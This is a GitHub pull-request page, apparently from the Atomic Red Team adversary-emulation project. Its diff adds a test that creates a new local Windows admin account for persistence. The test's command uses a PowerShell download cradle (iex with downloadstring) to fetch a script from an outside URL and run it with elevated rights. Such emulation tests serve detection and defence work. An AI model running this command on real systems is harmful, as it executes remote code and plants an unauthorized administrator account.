Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

New LocalAdmin Persistence Technique #2602

Merged
merged 4 commits into from
Nov 17, 2023
Merged
Changes from 3 commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 10 additions & 0 deletions atomics/T1136.001/T1136.001.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -175,3 +175,13 @@ atomic_tests:
net user /del "#{username}" >nul 2>&1
name: command_prompt
elevation_required: true
- name: Create a new Windows admin user via .NET
auto_generated_guid:
description: |
Creates a new admin user in a powershell session without using net.exe
supported_platforms:
- windows
executor:
command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/0xv1n/dotnetfun/9b3b0d11d1c156909c0b1823cff3004f80b89b1f/Persistence/CreateNewLocalAdmin_ART.ps1')
name: powershell
elevation_required: true
Loading